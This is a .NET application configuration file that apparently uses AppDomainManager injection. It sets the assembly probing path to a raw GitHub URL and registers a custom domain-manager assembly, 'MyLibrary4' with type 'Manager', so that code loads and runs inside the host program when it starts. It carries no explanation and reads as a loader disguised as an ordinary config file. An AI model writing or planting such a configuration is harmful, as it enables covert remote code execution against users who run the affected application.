<configuration>
<runtime>
<assemblyBinding xmlns="urn:schemas-microsoft-com:asm.v1">
<probing privatePath="https://raw.githubusercontent.com/Paperflows/RunPaperflows/main/"/>
</assemblyBinding> 
<appDomainManagerAssembly value="MyLibrary4, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null" />  
<appDomainManagerType value="Manager" />  
</runtime>
</configuration>